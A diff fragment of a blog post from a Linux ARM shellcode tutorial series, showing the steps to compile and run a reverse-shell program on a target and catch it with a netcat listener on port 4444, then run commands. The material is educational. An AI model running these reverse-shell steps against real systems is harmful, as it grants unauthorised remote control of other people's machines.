jumpnow/jumpnowtek-site/_posts/2018-12-21-linux-arm-shellcode-part3.md

     target:$ gcc main.c -o rshell
     target:$ ./rshell

-Then on the remote machine start a listener.
-I am using openbsd-netcat.
+Then on the remote machine in the shell you started the listener you can now run commands on the target

     remote:$ nc -l 4444
     ls